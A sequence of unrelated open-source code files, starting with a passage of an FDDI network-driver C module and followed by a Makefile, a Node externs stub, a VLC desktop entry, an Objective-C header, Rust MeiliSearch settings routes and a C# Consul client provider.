if (phy->t_val[7] || phy->r_val[7]) {
DB_PCMN(1, "PCM %c : E103 LCT fail %s",
phy->phy_name,
phy->t_val[7] ? "local" : "remote");
queue_event(smc,(int)(EVENT_PCM+phy->np),PC_START) ;
}
break ;
case 9:
if (phy->t_val[8] || phy->r_val[8]) {
if (phy->t_val[8])
phy->cf_loop = TRUE ;
phy->td_flag = TRUE ;
}
break ;
case 10:
if (phy->r_val[9]) {
/* neighbor intends to have MAC on output */ ;
mib->fddiPORTMacIndicated.R_val = TRUE ;
}
else {
/* neighbor does not intend to have MAC on output */ ;
mib->fddiPORTMacIndicated.R_val = FALSE ;
}
break ;
}
}
/*
* PCM pseudo code 5.1 .. 6.1
*/
static void pc_tcode_actions(struct s_smc *smc, const int bit, struct s_phy *phy)
{
int np = phy->np ;
struct fddi_mib_p *mib ;
mib = phy->mib ;
switch(bit) {
case 0:
phy->t_val[0] = 0 ; /* no escape used */
break ;
case 1:
if (mib->fddiPORTMy_Type == TS || mib->fddiPORTMy_Type == TM)
phy->t_val[1] = 1 ;
else
phy->t_val[1] = 0 ;
break ;
case 2 :
if (mib->fddiPORTMy_Type == TB || mib->fddiPORTMy_Type == TM)
phy->t_val[2] = 1 ;
else
phy->t_val[2] = 0 ;
break ;
case 3:
{
int type,ne ;
int policy ;
type = mib->fddiPORTMy_Type ;
ne = mib->fddiPORTNeighborType ;
policy = smc->mib.fddiSMTConnectionPolicy ;
phy->t_val[3] = 1 ; /* Accept connection */
switch (type) {
case TA :
if (
((policy & POLICY_AA) && ne == TA) ||
((policy & POLICY_AB) && ne == TB) ||
((policy & POLICY_AS) && ne == TS) ||
((policy & POLICY_AM) && ne == TM) )
phy->t_val[3] = 0 ; /* Reject */
break ;
case TB :
if (
((policy & POLICY_BA) && ne == TA) ||
((policy & POLICY_BB) && ne == TB) ||
((policy & POLICY_BS) && ne == TS) ||
((policy & POLICY_BM) && ne == TM) )
phy->t_val[3] = 0 ; /* Reject */
break ;
case TS :
if (
((policy & POLICY_SA) && ne == TA) ||
((policy & POLICY_SB) && ne == TB) ||
((policy & POLICY_SS) && ne == TS) ||
((policy & POLICY_SM) && ne == TM) )
phy->t_val[3] = 0 ; /* Reject */
break ;
case TM :
if ( ne == TM ||
((policy & POLICY_MA) && ne == TA) ||
((policy & POLICY_MB) && ne == TB) ||
((policy & POLICY_MS) && ne == TS) ||
((policy & POLICY_MM) && ne == TM) )
phy->t_val[3] = 0 ; /* Reject */
break ;
}
#ifndef SLIM_SMT
/*
* detect undesirable connection attempt event
*/
if ( (type == TA && ne == TA ) ||
(type == TA && ne == TS ) ||
(type == TB && ne == TB ) ||
(type == TB && ne == TS ) ||
(type == TS && ne == TA ) ||
(type == TS && ne == TB ) ) {
smt_srf_event(smc,SMT_EVENT_PORT_CONNECTION,
(int) (INDEX_PORT+ phy->np) ,0) ;
}
#endif
}
break ;
case 4:
if (mib->fddiPORTPC_Withhold == PC_WH_NONE) {
if (phy->pc_lem_fail) {
phy->t_val[4] = 1 ; /* long */
phy->t_val[5] = 0 ;
}
else {
phy->t_val[4] = 0 ;
if (mib->fddiPORTLCTFail_Ct > 0)
phy->t_val[5] = 1 ; /* medium */
else
phy->t_val[5] = 0 ; /* short */
/*
				 * Implementer's choice: use medium
* instead of short when undesired
* connection attempt is made.
*/
if (phy->wc_flag)
phy->t_val[5] = 1 ; /* medium */
}
mib->fddiPORTConnectState = PCM_CONNECTING ;
}
else {
mib->fddiPORTConnectState = PCM_STANDBY ;
phy->t_val[4] = 1 ; /* extended */
phy->t_val[5] = 1 ;
}
break ;
case 5:
break ;
case 6:
/* we do NOT have a MAC for LCT */
phy->t_val[6] = 0 ;
break ;
case 7:
phy->cf_loop = FALSE ;
lem_check_lct(smc,phy) ;
if (phy->pc_lem_fail) {
DB_PCMN(1, "PCM %c : E104 LCT failed", phy->phy_name);
phy->t_val[7] = 1 ;
}
else
phy->t_val[7] = 0 ;
break ;
case 8:
phy->t_val[8] = 0 ; /* Don't request MAC loopback */
break ;
case 9:
phy->cf_loop = 0 ;
if ((mib->fddiPORTPC_Withhold != PC_WH_NONE) ||
((smc->s.sas == SMT_DAS) && (phy->wc_flag))) {
queue_event(smc,EVENT_PCM+np,PC_START) ;
break ;
}
phy->t_val[9] = FALSE ;
switch (smc->s.sas) {
case SMT_DAS :
/*
* MAC intended on output
*/
if (phy->pc_mode == PM_TREE) {
if ((np == PB) || ((np == PA) &&
(smc->y[PB].mib->fddiPORTConnectState !=
PCM_ACTIVE)))
phy->t_val[9] = TRUE ;
}
else {
if (np == PB)
phy->t_val[9] = TRUE ;
}
break ;
case SMT_SAS :
if (np == PS)
phy->t_val[9] = TRUE ;
break ;
#ifdef CONCENTRATOR
case SMT_NAC :
/*
* MAC intended on output
*/
if (np == PB)
phy->t_val[9] = TRUE ;
break ;
#endif
}
mib->fddiPORTMacIndicated.T_val = phy->t_val[9] ;
break ;
}
DB_PCMN(1, "SIG snd %x %x:", bit, phy->t_val[bit]);
}
/*
* return status twisted (called by SMT)
*/
int pcm_status_twisted(struct s_smc *smc)
{
int twist = 0 ;
if (smc->s.sas != SMT_DAS)
return 0;
if (smc->y[PA].twisted && (smc->y[PA].mib->fddiPORTPCMState == PC8_ACTIVE))
twist |= 1 ;
if (smc->y[PB].twisted && (smc->y[PB].mib->fddiPORTPCMState == PC8_ACTIVE))
twist |= 2 ;
return twist;
}
/*
* return status (called by SMT)
* type
* state
* remote phy type
* remote mac yes/no
*/
void pcm_status_state(struct s_smc *smc, int np, int *type, int *state,
int *remote, int *mac)
{
struct s_phy *phy = &smc->y[np] ;
struct fddi_mib_p *mib ;
mib = phy->mib ;
/* remote PHY type and MAC - set only if active */
*mac = 0 ;
*type = mib->fddiPORTMy_Type ; /* our PHY type */
*state = mib->fddiPORTConnectState ;
*remote = mib->fddiPORTNeighborType ;
switch(mib->fddiPORTPCMState) {
case PC8_ACTIVE :
*mac = mib->fddiPORTMacIndicated.R_val ;
break ;
}
}
/*
* return rooted station status (called by SMT)
*/
int pcm_rooted_station(struct s_smc *smc)
{
int n ;
for (n = 0 ; n < NUMPHYS ; n++) {
if (smc->y[n].mib->fddiPORTPCMState == PC8_ACTIVE &&
smc->y[n].mib->fddiPORTNeighborType == TM)
return 0;
}
return 1;
}
/*
* Interrupt actions for PLC & PCM events
*/
void plc_irq(struct s_smc *smc, int np, unsigned int cmd)
/* int np; PHY index */
{
struct s_phy *phy = &smc->y[np] ;
struct s_plc *plc = &phy->plc ;
int n ;
#ifdef SUPERNET_3
int corr_mask ;
#endif /* SUPERNET_3 */
int i ;
if (np >= smc->s.numphys) {
plc->soft_err++ ;
return ;
}
if (cmd & PL_EBUF_ERR) { /* elastic buff. det. over-|underflow*/
/*
* Check whether the SRF Condition occurred.
*/
if (!plc->ebuf_cont && phy->mib->fddiPORTPCMState == PC8_ACTIVE){
/*
* This is the real Elasticity Error.
* More than one in a row are treated as a
* single one.
* Only count this in the active state.
*/
phy->mib->fddiPORTEBError_Ct ++ ;
}
plc->ebuf_err++ ;
if (plc->ebuf_cont <= 1000) {
/*
			 * Prevent the counter from wrapping when the
			 * interrupt stays asserted for a very long time.
*/
plc->ebuf_cont++ ; /* Ebuf continuous error */
}
#ifdef SUPERNET_3
if (plc->ebuf_cont == 1000 &&
((inpw(PLC(np,PL_STATUS_A)) & PLC_REV_MASK) ==
PLC_REV_SN3)) {
/*
			 * This interrupt remained high for at least
* 1000 consecutive interrupt calls.
*
* This is caused by a hardware error of the
* ORION part of the Supernet III chipset.
*
* Disable this bit from the mask.
*/
corr_mask = (plc_imsk_na & ~PL_EBUF_ERR) ;
outpw(PLC(np,PL_INTR_MASK),corr_mask);
/*
* Disconnect from the ring.
* Call the driver with the reset indication.
*/
queue_event(smc,EVENT_ECM,EC_DISCONNECT) ;
/*
* Make an error log entry.
*/
SMT_ERR_LOG(smc,SMT_E0136, SMT_E0136_MSG) ;
/*
* Indicate the Reset.
*/
drv_reset_indication(smc) ;
}
#endif /* SUPERNET_3 */
} else {
/* Reset the continuous error variable */
plc->ebuf_cont = 0 ; /* reset Ebuf continuous error */
}
if (cmd & PL_PHYINV) { /* physical layer invalid signal */
plc->phyinv++ ;
}
if (cmd & PL_VSYM_CTR) { /* violation symbol counter has incr.*/
plc->vsym_ctr++ ;
}
if (cmd & PL_MINI_CTR) { /* dep. on PLC_CNTRL_A's MINI_CTR_INT*/
plc->mini_ctr++ ;
}
if (cmd & PL_LE_CTR) { /* link error event counter */
int j ;
/*
* note: PL_LINK_ERR_CTR MUST be read to clear it
*/
j = inpw(PLC(np,PL_LE_THRESHOLD)) ;
i = inpw(PLC(np,PL_LINK_ERR_CTR)) ;
if (i < j) {
/* wrapped around */
i += 256 ;
}
if (phy->lem.lem_on) {
/* Note: Lem errors shall only be counted when
* link is ACTIVE or LCT is active.
*/
phy->lem.lem_errors += i ;
phy->mib->fddiPORTLem_Ct += i ;
}
}
if (cmd & PL_TPC_EXPIRED) { /* TPC timer reached zero */
if (plc->p_state == PS_LCT) {
/*
* end of LCT
*/
;
}
plc->tpc_exp++ ;
}
if (cmd & PL_LS_MATCH) { /* LS == LS in PLC_CNTRL_B's MATCH_LS*/
switch (inpw(PLC(np,PL_CNTRL_B)) & PL_MATCH_LS) {
case PL_I_IDLE : phy->curr_ls = PC_ILS ; break ;
case PL_I_HALT : phy->curr_ls = PC_HLS ; break ;
case PL_I_MASTR : phy->curr_ls = PC_MLS ; break ;
case PL_I_QUIET : phy->curr_ls = PC_QLS ; break ;
}
}
if (cmd & PL_PCM_BREAK) { /* PCM has entered the BREAK state */
int reason;
reason = inpw(PLC(np,PL_STATUS_B)) & PL_BREAK_REASON ;
switch (reason) {
case PL_B_PCS : plc->b_pcs++ ; break ;
case PL_B_TPC : plc->b_tpc++ ; break ;
case PL_B_TNE : plc->b_tne++ ; break ;
case PL_B_QLS : plc->b_qls++ ; break ;
case PL_B_ILS : plc->b_ils++ ; break ;
case PL_B_HLS : plc->b_hls++ ; break ;
}
/*jd 05-Aug-1999 changed: Bug #10419 */
DB_PCMN(1, "PLC %d: MDcF = %x", np, smc->e.DisconnectFlag);
if (smc->e.DisconnectFlag == FALSE) {
DB_PCMN(1, "PLC %d: restart (reason %x)", np, reason);
queue_event(smc,EVENT_PCM+np,PC_START) ;
}
else {
DB_PCMN(1, "PLC %d: NO!! restart (reason %x)",
np, reason);
}
return ;
}
/*
* If both CODE & ENABLE are set ignore enable
*/
if (cmd & PL_PCM_CODE) { /* receive last sign.-bit | LCT complete */
queue_event(smc,EVENT_PCM+np,PC_SIGNAL) ;
n = inpw(PLC(np,PL_RCV_VECTOR)) ;
for (i = 0 ; i < plc->p_bits ; i++) {
phy->r_val[plc->p_start+i] = n & 1 ;
n >>= 1 ;
}
}
else if (cmd & PL_PCM_ENABLED) { /* asserted SC_JOIN, scrub.completed*/
queue_event(smc,EVENT_PCM+np,PC_JOIN) ;
}
if (cmd & PL_TRACE_PROP) { /* MLS while PC8_ACTIV || PC2_TRACE */
/*PC22b*/
if (!phy->tr_flag) {
DB_PCMN(1, "PCM : irq TRACE_PROP %d %d",
np, smc->mib.fddiSMTECMState);
phy->tr_flag = TRUE ;
smc->e.trace_prop |= ENTITY_BIT(ENTITY_PHY(np)) ;
queue_event(smc,EVENT_ECM,EC_TRACE_PROP) ;
}
}
/*
* filter PLC glitch ???
* QLS || HLS only while in PC2_TRACE state
*/
if ((cmd & PL_SELF_TEST) && (phy->mib->fddiPORTPCMState == PC2_TRACE)) {
/*PC22a*/
if (smc->e.path_test == PT_PASSED) {
DB_PCMN(1, "PCM : state = %s %d",
get_pcmstate(smc, np),
phy->mib->fddiPORTPCMState);
smc->e.path_test = PT_PENDING ;
queue_event(smc,EVENT_ECM,EC_PATH_TEST) ;
}
}
if (cmd & PL_TNE_EXPIRED) { /* TNE: length of noise events */
/* break_required (TNE > NS_Max) */
if (phy->mib->fddiPORTPCMState == PC8_ACTIVE) {
if (!phy->tr_flag) {
DB_PCMN(1, "PCM %c : PC81 %s",
phy->phy_name, "NSE");
queue_event(smc, EVENT_PCM + np, PC_START);
return;
}
}
}
#if 0
if (cmd & PL_NP_ERR) { /* NP has requested to r/w an inv reg*/
/*
* It's a bug by AMD
*/
plc->np_err++ ;
}
	/* pin inactive (GND) */
	if (cmd & PL_PARITY_ERR) {	/* parity error detected on TX9-0 input */
plc->parity_err++ ;
}
if (cmd & PL_LSDO) { /* carrier detected */
;
}
#endif
}
#ifdef DEBUG
/*
* fill state struct
*/
void pcm_get_state(struct s_smc *smc, struct smt_state *state)
{
struct s_phy *phy ;
struct pcm_state *pcs ;
int i ;
int ii ;
short rbits ;
short tbits ;
struct fddi_mib_p *mib ;
for (i = 0, phy = smc->y, pcs = state->pcm_state ; i < NUMPHYS ;
i++ , phy++, pcs++ ) {
mib = phy->mib ;
pcs->pcm_type = (u_char) mib->fddiPORTMy_Type ;
pcs->pcm_state = (u_char) mib->fddiPORTPCMState ;
pcs->pcm_mode = phy->pc_mode ;
pcs->pcm_neighbor = (u_char) mib->fddiPORTNeighborType ;
pcs->pcm_bsf = mib->fddiPORTBS_Flag ;
pcs->pcm_lsf = phy->ls_flag ;
pcs->pcm_lct_fail = (u_char) mib->fddiPORTLCTFail_Ct ;
pcs->pcm_ls_rx = LS2MIB(sm_pm_get_ls(smc,i)) ;
for (ii = 0, rbits = tbits = 0 ; ii < NUMBITS ; ii++) {
rbits <<= 1 ;
tbits <<= 1 ;
if (phy->r_val[NUMBITS-1-ii])
rbits |= 1 ;
if (phy->t_val[NUMBITS-1-ii])
tbits |= 1 ;
}
pcs->pcm_r_val = rbits ;
pcs->pcm_t_val = tbits ;
}
}
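/*
 * read the current PCM state from the PLC and map it to a PC_xxx code
 */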
int get_pcm_state(struct s_smc *smc, int np)
{
int pcs ;
SK_UNUSED(smc) ;
switch (inpw(PLC(np,PL_STATUS_B)) & PL_PCM_STATE) {
case PL_PC0 : pcs = PC_STOP ; break ;
case PL_PC1 : pcs = PC_START ; break ;
case PL_PC2 : pcs = PC_TRACE ; break ;
case PL_PC3 : pcs = PC_SIGNAL ; break ;
case PL_PC4 : pcs = PC_SIGNAL ; break ;
case PL_PC5 : pcs = PC_SIGNAL ; break ;
case PL_PC6 : pcs = PC_JOIN ; break ;
case PL_PC7 : pcs = PC_JOIN ; break ;
case PL_PC8 : pcs = PC_ENABLE ; break ;
case PL_PC9 : pcs = PC_MAINT ; break ;
default : pcs = PC_DISABLE ; break ;
}
return pcs;
}
char *get_linestate(struct s_smc *smc, int np)
{
char *ls = "" ;
SK_UNUSED(smc) ;
switch (inpw(PLC(np,PL_STATUS_A)) & PL_LINE_ST) {
case PL_L_NLS : ls = "NOISE" ; break ;
case PL_L_ALS : ls = "ACTIV" ; break ;
case PL_L_UND : ls = "UNDEF" ; break ;
case PL_L_ILS4: ls = "ILS 4" ; break ;
case PL_L_QLS : ls = "QLS" ; break ;
case PL_L_MLS : ls = "MLS" ; break ;
case PL_L_HLS : ls = "HLS" ; break ;
case PL_L_ILS16:ls = "ILS16" ; break ;
#ifdef lint
default: ls = "unknown" ; break ;
#endif
}
return ls;
}
char *get_pcmstate(struct s_smc *smc, int np)
{
char *pcs ;
SK_UNUSED(smc) ;
switch (inpw(PLC(np,PL_STATUS_B)) & PL_PCM_STATE) {
case PL_PC0 : pcs = "OFF" ; break ;
case PL_PC1 : pcs = "BREAK" ; break ;
case PL_PC2 : pcs = "TRACE" ; break ;
case PL_PC3 : pcs = "CONNECT"; break ;
case PL_PC4 : pcs = "NEXT" ; break ;
case PL_PC5 : pcs = "SIGNAL" ; break ;
case PL_PC6 : pcs = "JOIN" ; break ;
case PL_PC7 : pcs = "VERIFY" ; break ;
case PL_PC8 : pcs = "ACTIV" ; break ;
case PL_PC9 : pcs = "MAINT" ; break ;
default : pcs = "UNKNOWN" ; break ;
}
return pcs;
}
void list_phy(struct s_smc *smc)
{
struct s_plc *plc ;
int np ;
for (np = 0 ; np < NUMPHYS ; np++) {
plc = &smc->y[np].plc ;
printf("PHY %d:\tERRORS\t\t\tBREAK_REASONS\t\tSTATES:\n",np) ;
printf("\tsoft_error: %ld \t\tPC_Start : %ld\n",
plc->soft_err,plc->b_pcs);
printf("\tparity_err: %ld \t\tTPC exp. : %ld\t\tLine: %s\n",
plc->parity_err,plc->b_tpc,get_linestate(smc,np)) ;
printf("\tebuf_error: %ld \t\tTNE exp. : %ld\n",
plc->ebuf_err,plc->b_tne) ;
printf("\tphyinvalid: %ld \t\tQLS det. : %ld\t\tPCM : %s\n",
plc->phyinv,plc->b_qls,get_pcmstate(smc,np)) ;
printf("\tviosym_ctr: %ld \t\tILS det. : %ld\n",
plc->vsym_ctr,plc->b_ils) ;
printf("\tmingap_ctr: %ld \t\tHLS det. : %ld\n",
plc->mini_ctr,plc->b_hls) ;
printf("\tnodepr_err: %ld\n",plc->np_err) ;
printf("\tTPC_exp : %ld\n",plc->tpc_exp) ;
printf("\tLEM_err : %ld\n",smc->y[np].lem.lem_errors) ;
}
}
#ifdef CONCENTRATOR
void pcm_lem_dump(struct s_smc *smc)
{
int i ;
struct s_phy *phy ;
struct fddi_mib_p *mib ;
char *entostring() ;
printf("PHY errors BER\n") ;
printf("----------------------\n") ;
for (i = 0,phy = smc->y ; i < NUMPHYS ; i++,phy++) {
if (!plc_is_installed(smc,i))
continue ;
mib = phy->mib ;
printf("%s\t%ld\t10E-%d\n",
entostring(smc,ENTITY_PHY(i)),
mib->fddiPORTLem_Ct,
mib->fddiPORTLer_Estimate) ;
}
}
#endif
#endif
| {
"pile_set_name": "Github"
} |
include ../../../Make.helper
COMPILE_IDS:=$(call config_ids,../compile_options.config)
TABLES = $(foreach COMPILE_ID,$(COMPILE_IDS),tbl-count-$(COMPILE_ID).tex)
CONFIG_FILES=index-filter.config ../index.config ../test_case.config
all: count.pdf
count.pdf: count.tex
@echo "Use pdflatex to generate count.pdf"
	@pdflatex count.tex >> LaTeX.log 2>&1
count.tex: ../results/all.txt ../../basic_functions.R count.R $(CONFIG_FILES)
@echo "Use R to generate count.tex"
@R --vanilla < count.R > R.log 2>&1
clean:
rm -f $(TABLES) count.pdf count.aux count.tex \
count.log R.log LaTeX.log
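# Usage sketch (assumes R and pdflatex are available on PATH, per the recipes above):
#   make            # runs count.R to build count.tex, then pdflatex to build count.pdf
#   make clean      # removes the generated tables, logs and the PDF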
| {
"pile_set_name": "Github"
} |
// Automatically generated from TypeScript type definitions provided by
// DefinitelyTyped (https://github.com/DefinitelyTyped/DefinitelyTyped),
// which is licensed under the MIT license; see file DefinitelyTyped-LICENSE
// in parent directory.
// Type definitions for Node.js 10.5.x
// Project: http://nodejs.org/
// Definitions by: Microsoft TypeScript <http://typescriptlang.org>
// DefinitelyTyped <https://github.com/DefinitelyTyped/DefinitelyTyped>
// Parambir Singh <https://github.com/parambirs>
// Christian Vaagland Tellnes <https://github.com/tellnes>
// Wilco Bakker <https://github.com/WilcoBakker>
// Nicolas Voigt <https://github.com/octo-sniffle>
// Chigozirim C. <https://github.com/smac89>
// Flarna <https://github.com/Flarna>
// Mariusz Wiktorczyk <https://github.com/mwiktorczyk>
// wwwy3y3 <https://github.com/wwwy3y3>
// Deividas Bakanas <https://github.com/DeividasBakanas>
// Kelvin Jin <https://github.com/kjin>
// Alvis HT Tang <https://github.com/alvis>
// Sebastian Silbermann <https://github.com/eps1lon>
// Hannes Magnusson <https://github.com/Hannes-Magnusson-CK>
// Alberto Schiabel <https://github.com/jkomyno>
// Klaus Meinhardt <https://github.com/ajafff>
// Huw <https://github.com/hoo29>
// Nicolas Even <https://github.com/n-e>
// Bruno Scheufler <https://github.com/brunoscheufler>
// Mohsen Azimi <https://github.com/mohsen1>
// Hoàng Văn Khải <https://github.com/KSXGitHub>
// Alexander T. <https://github.com/a-tarasyuk>
// Lishude <https://github.com/islishude>
// Andrew Makarov <https://github.com/r3nya>
// Zane Hannan AU <https://github.com/ZaneHannanAU>
// Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped
/**
* @externs
* @fileoverview Definitions for module "console"
*/
module.exports = console;
| {
"pile_set_name": "Github"
} |
[Desktop Entry]
Version=1.0
Name=VLC
GenericName=VLC media player
Comment=Read, capture, broadcast your multimedia streams
Exec=vlc.wrapper
TryExec=vlc.wrapper
Icon=vlc
Terminal=false
Type=Application
Categories=AudioVideo;Player;Recorder;
MimeType=video/dv;video/mpeg;video/x-mpeg;video/msvideo;video/quicktime;video/x-anim;video/x-avi;video/x-ms-asf;video/x-ms-wmv;video/x-msvideo;video/x-nsv;video/x-flc;video/x-fli;video/x-flv;video/vnd.rn-realvideo;video/mp4;video/mp4v-es;video/mp2t;application/ogg;application/x-ogg;video/x-ogm+ogg;audio/x-vorbis+ogg;audio/ogg;video/ogg;application/x-matroska;audio/x-matroska;video/x-matroska;video/webm;audio/webm;audio/x-mp3;audio/x-mpeg;audio/mpeg;audio/x-wav;audio/x-mpegurl;audio/x-scpls;audio/x-m4a;audio/x-ms-asf;audio/x-ms-asx;audio/x-ms-wax;application/vnd.rn-realmedia;audio/x-real-audio;audio/x-pn-realaudio;application/x-flac;audio/x-flac;application/x-shockwave-flash;misc/ultravox;audio/vnd.rn-realaudio;audio/x-pn-aiff;audio/x-pn-au;audio/x-pn-wav;audio/x-pn-windows-acm;image/vnd.rn-realpix;audio/x-pn-realaudio-plugin;application/x-extension-mp4;audio/mp4;audio/amr;audio/amr-wb;x-content/video-vcd;x-content/video-svcd;x-content/video-dvd;x-content/audio-cdda;x-content/audio-player;application/xspf+xml;x-scheme-handler/mms;x-scheme-handler/rtmp;x-scheme-handler/rtsp;video/vnd.mpegurl;
Keywords=Player;Capture;DVD;Audio;Video;Server;Broadcast;
[AppImageHub]
# Dear upstream developer, please include update information in your AppImage
# (e.g., with appimagetool -u) so that users can easily update the AppImage
X-AppImage-Signature=no valid OpenPGP data found. the signature could not be verified. Please remember that the signature file (.sig or .asc) should be the first file given on the command line.
X-AppImage-Type=2
X-AppImage-Architecture=x86_64
| {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit) (Debug version compiled Jul 6 2018 12:02:43).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2015 by Steve Nygard.
//
#import <AppKit/NSViewController.h>
#import "NSTabViewDelegate-Protocol.h"
#import "NSTableViewDataSource-Protocol.h"
@class MSDocument, NSArray, NSMenu, NSString, NSTableView;
@interface MSManageForeignSymbolsView : NSViewController <NSTableViewDataSource, NSTabViewDelegate>
{
BOOL _cogEnabled;
MSDocument *_document;
NSTableView *_tableView;
NSArray *_symbols;
NSMenu *_contextMenu;
}
- (void).cxx_destruct;
@property(retain, nonatomic) NSMenu *contextMenu; // @synthesize contextMenu=_contextMenu;
@property(nonatomic) BOOL cogEnabled; // @synthesize cogEnabled=_cogEnabled;
@property(retain, nonatomic) NSArray *symbols; // @synthesize symbols=_symbols;
@property(retain, nonatomic) NSTableView *tableView; // @synthesize tableView=_tableView;
@property(retain, nonatomic) MSDocument *document; // @synthesize document=_document;
- (void)unlinkFromLibrary:(id)arg1;
- (void)editInLibrary:(id)arg1;
- (BOOL)validateMenuItem:(id)arg1;
- (void)showContextMenu:(id)arg1;
- (void)tableViewSelectionDidChange:(id)arg1;
- (id)tableView:(id)arg1 objectValueForTableColumn:(id)arg2 row:(long long)arg3;
- (long long)numberOfRowsInTableView:(id)arg1;
- (void)viewDidAppear;
- (void)viewDidLoad;
- (void)buildSymbolList;
// Remaining properties
@property(readonly, copy) NSString *debugDescription;
@property(readonly, copy) NSString *description;
@property(readonly) unsigned long long hash;
@property(readonly) Class superclass;
@end
| {
"pile_set_name": "Github"
} |
use actix_web::{web, HttpResponse};
use actix_web::{delete, get, post};
use meilisearch_core::settings::{SettingsUpdate, UpdateState};
use std::collections::BTreeSet;
use crate::error::{Error, ResponseError};
use crate::helpers::Authentication;
use crate::routes::{IndexParam, IndexUpdateResponse};
use crate::Data;
pub fn services(cfg: &mut web::ServiceConfig) {
cfg.service(get).service(update).service(delete);
}
#[get(
"/indexes/{index_uid}/settings/stop-words",
wrap = "Authentication::Private"
)]
async fn get(
data: web::Data<Data>,
path: web::Path<IndexParam>,
) -> Result<HttpResponse, ResponseError> {
let index = data
.db
.open_index(&path.index_uid)
.ok_or(Error::index_not_found(&path.index_uid))?;
let reader = data.db.main_read_txn()?;
let stop_words = index.main.stop_words(&reader)?;
Ok(HttpResponse::Ok().json(stop_words))
}
#[post(
"/indexes/{index_uid}/settings/stop-words",
wrap = "Authentication::Private"
)]
async fn update(
data: web::Data<Data>,
path: web::Path<IndexParam>,
body: web::Json<BTreeSet<String>>,
) -> Result<HttpResponse, ResponseError> {
let index = data
.db
.open_index(&path.index_uid)
.ok_or(Error::index_not_found(&path.index_uid))?;
let settings = SettingsUpdate {
stop_words: UpdateState::Update(body.into_inner()),
..SettingsUpdate::default()
};
let update_id = data.db.update_write(|w| index.settings_update(w, settings))?;
Ok(HttpResponse::Accepted().json(IndexUpdateResponse::with_id(update_id)))
}
#[delete(
"/indexes/{index_uid}/settings/stop-words",
wrap = "Authentication::Private"
)]
async fn delete(
data: web::Data<Data>,
path: web::Path<IndexParam>,
) -> Result<HttpResponse, ResponseError> {
let index = data
.db
.open_index(&path.index_uid)
.ok_or(Error::index_not_found(&path.index_uid))?;
let settings = SettingsUpdate {
stop_words: UpdateState::Clear,
..SettingsUpdate::default()
};
let update_id = data.db.update_write(|w| index.settings_update(w, settings))?;
Ok(HttpResponse::Accepted().json(IndexUpdateResponse::with_id(update_id)))
}
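// Usage sketch for the three handlers above (illustrative; the host/port and the
// API-key header name are assumptions, not taken from this file):
//   GET    /indexes/movies/settings/stop-words   -> returns the current stop-word set
//   POST   /indexes/movies/settings/stop-words   -> body like ["the","a","an"] replaces it
//   DELETE /indexes/movies/settings/stop-words   -> clears it
// e.g. curl -X POST 'http://localhost:7700/indexes/movies/settings/stop-words' \
//          -H 'X-Meili-API-Key: <private-key>' --data '["the","a","an"]'
// Each write returns 202 Accepted with the pending update id.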
| {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Concurrent;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using Consul;
using Microsoft.Extensions.Logging;
using Surging.Core.Consul.Configurations;
using Surging.Core.Consul.Internal.Cluster.HealthChecks;
using Surging.Core.Consul.Internal.Cluster.Implementation.Selectors;
using Surging.Core.Consul.Internal.Cluster.Implementation.Selectors.Implementation;
using Surging.Core.CPlatform;
using Surging.Core.CPlatform.Address;
using Surging.Core.CPlatform.Exceptions;
using Surging.Core.CPlatform.Runtime.Client.Address.Resolvers.Implementation.Selectors;
using Level = Microsoft.Extensions.Logging.LogLevel;
namespace Surging.Core.Consul.Internal.Implementation
{
public class DefaultConsulClientProvider : IConsulClientProvider
{
private ConfigInfo _config;
private readonly IHealthCheckService _healthCheckService;
private readonly IConsulAddressSelector _consulAddressSelector;
private readonly ILogger<DefaultConsulClientProvider> _logger;
private readonly ConcurrentDictionary<string, IAddressSelector> _addressSelectors = new
ConcurrentDictionary<string, IAddressSelector>();
private readonly ConcurrentDictionary<AddressModel, ConsulClient> _consulClients = new
ConcurrentDictionary<AddressModel, ConsulClient>();
public DefaultConsulClientProvider(ConfigInfo config, IHealthCheckService healthCheckService, IConsulAddressSelector consulAddressSelector,
ILogger<DefaultConsulClientProvider> logger)
{
_config = config;
_healthCheckService = healthCheckService;
_consulAddressSelector = consulAddressSelector;
_logger = logger;
}
public async ValueTask<ConsulClient> GetClient()
{
ConsulClient result = null;
var address = new List<AddressModel>();
foreach (var addressModel in _config.Addresses)
{
_healthCheckService.Monitor(addressModel);
var task = _healthCheckService.IsHealth(addressModel);
if (!(task.IsCompletedSuccessfully ? task.Result : await task))
{
continue;
}
address.Add(addressModel);
}
if (address.Count == 0)
{
if (_logger.IsEnabled(Level.Warning))
_logger.LogWarning($"找不到可用的注册中心地址。");
return null;
}
var vt = _consulAddressSelector.SelectAsync(new AddressSelectContext
{
Descriptor = new ServiceDescriptor { Id = nameof(DefaultConsulClientProvider) },
Address = address
});
var addr = vt.IsCompletedSuccessfully ? vt.Result : await vt;
if (addr != null)
{
var ipAddress = addr as IpAddressModel;
result = _consulClients.GetOrAdd(ipAddress, new ConsulClient(config =>
{
config.Address = new Uri($"http://{ipAddress.Ip}:{ipAddress.Port}");
}, null, h => { h.UseProxy = false; h.Proxy = null; }));
}
return result;
}
public async ValueTask<IEnumerable<ConsulClient>> GetClients()
{
var result = new List<ConsulClient>();
foreach (var address in _config.Addresses)
{
var ipAddress = address as IpAddressModel;
if (await _healthCheckService.IsHealth(address))
{
result.Add(_consulClients.GetOrAdd(ipAddress, new ConsulClient(config =>
{
config.Address = new Uri($"http://{ipAddress.Ip}:{ipAddress.Port}");
}, null, h => { h.UseProxy = false; h.Proxy = null; })));
}
}
return result;
}
public async ValueTask Check()
{
foreach (var address in _config.Addresses)
{
if (!await _healthCheckService.IsHealth(address))
{
throw new RegisterConnectionException(string.Format("Registry center {0} connection error, please contact the administrator", address.ToString()));
}
}
}
}
}
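// Usage sketch (illustrative; assumes the provider is resolved from the project's
// DI container, which is not shown in this file):
//   var provider = container.Resolve<IConsulClientProvider>();
//   var client = await provider.GetClient();   // null when no address is healthy
//   if (client != null)
//   {
//       var services = await client.Agent.Services();
//   }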
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
